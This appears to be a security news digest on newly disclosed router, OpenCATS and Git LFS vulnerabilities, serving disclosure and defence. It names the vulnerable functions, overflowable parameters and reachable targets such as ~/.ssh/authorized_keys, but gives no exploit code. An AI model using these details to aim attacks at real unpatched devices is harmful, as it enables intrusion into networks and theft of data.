What you need to know today.

TRENDnet TEW-432BRP: 15 Remote Flaws Disclosed, Product is End-of-Life. A batch of 15 stack-based buffer overflow vulnerabilities was disclosed in the TRENDnet TEW-432BRP router running firmware 3.10B20. The flaws span multiple functions in the /goform/ handler — including formWlanSetup (CVE-2026-10183), formSysCmd (CVE-2026-10181), formSetWlanEncrypt (CVE-2026-10179), formSetPassword (CVE-2026-10162), formResetStatistic (CVE-2026-10161), formSetEnableWizard (CVE-2026-10160), formSysLog (CVE-2026-10159), and formPortFw (CVE-2026-10158) — all rated CVSS 8.8. An unauthenticated attacker can trigger remote code execution by sending crafted POST requests to the web management interface. As Vypr Intelligence reported, the product is end-of-life with no patches forthcoming, leaving every deployed unit permanently exploitable. Organizations still running TEW-432BRP should treat these devices as a critical risk and isolate or replace them immediately.

Edimax BR-6478AC: Seven Remote-Code-Execution Flaws Disclosed in 12-Hour Batch. Seven buffer overflow vulnerabilities were published for the Edimax BR-6478AC router (firmware 1.23), all accessible via the POST request handler. The affected functions include formWanTcpipSetup (CVE-2026-10165), formUSBFolder (CVE-2026-10164), formUSBAccount (CVE-2026-10163), and formQoS (CVE-2026-10126), each rated CVSS 8.8. An attacker can overflow buffers by manipulating arguments such as pppUserName, ShareName, UserName, or selSSID, leading to remote code execution on the device. As Vypr Intelligence noted, the rapid disclosure of seven distinct RCE vectors in a single day underscores the lack of security hardening in legacy SOHO routers. No patch has been announced; users should consider replacing the device or restricting WAN-side management access.

Tenda W12: Three Stack-Based Buffer Overflows in /bin/httpd. Three high-severity vulnerabilities (CVSS 8.8) were disclosed in the Tenda W12 router running firmware 3.0.0.7(4763). The flaws affect the functions cgiWifiMacFilterSet (CVE-2026-10191), cgiSysTimeInfoSet (CVE-2026-10189), and cgistaKickOff (CVE-2026-10188) within the /bin/httpd binary. Each can be exploited remotely by sending a crafted POST request with an oversized argument — wifiMacFilterSet.macList.mac, sec, or staMac respectively — causing a stack-based buffer overflow that yields remote code execution. No patch or mitigation guidance has been published. Given the device's exposure on internal networks, these flaws represent a credible pivot point for attackers who have already gained LAN access.

Totolink N300RH: Critical-Rated Web Interface Flaw. A critical vulnerability (CVSS 9.8) was identified in the Totolink N300RH router running firmware 6.1c.1353_B20190305. The issue resides in the setWiFiBasicConfig function of the wireless.so module within the web management interface (CVE-2026-10187). Manipulating the KeyS argument can lead to remote code execution without authentication. With a risk score of 0.64 (high) and no EPSS data yet, this is the highest-severity single CVE in today's window. Totolink has not released a patch; users should disable remote administration and monitor for firmware updates.

OpenCATS: Two SQL Injection Vulnerabilities in DataGrid Component. Two SQL injection flaws were disclosed in OpenCATS, the open-source applicant tracking system. CVE-2026-49489 (CVSS 8.5) allows authenticated attackers to extract database contents via the sortDirection parameter in the DataGrid component. CVE-2026-49490 (CVSS 8.1) targets the same DataGrid's filter handling, enabling SQL injection through crafted filters on the non-filterable Tags column in the Candidates DataGrid. Both affect OpenCATS through version 0.9.7.4. While authentication is required, the broad access these injections grant to applicant and recruitment data makes them attractive targets in HR-system intrusions. No patch has been announced.

Git LFS: Path Traversal via Malicious Repository Contents. A path traversal vulnerability (CVE-2025-26625) affects Git LFS versions 0.5.2 through 3.7.0. When a repository's working tree is populated with Git LFS objects, certain commands may write files outside the intended working directory, enabling an attacker who controls a repository's LFS objects to write arbitrary files on the cloning user's filesystem. This is a supply-chain style risk: a developer who clones a malicious repository could have files written to sensitive locations such as ~/.ssh/authorized_keys or system startup directories. The vulnerability has no EPSS score yet, but the attack vector — tricking a developer into cloning a boobytrapped repo — is well-understood and easy to automate. Users should update to Git LFS 3.7.1 or later.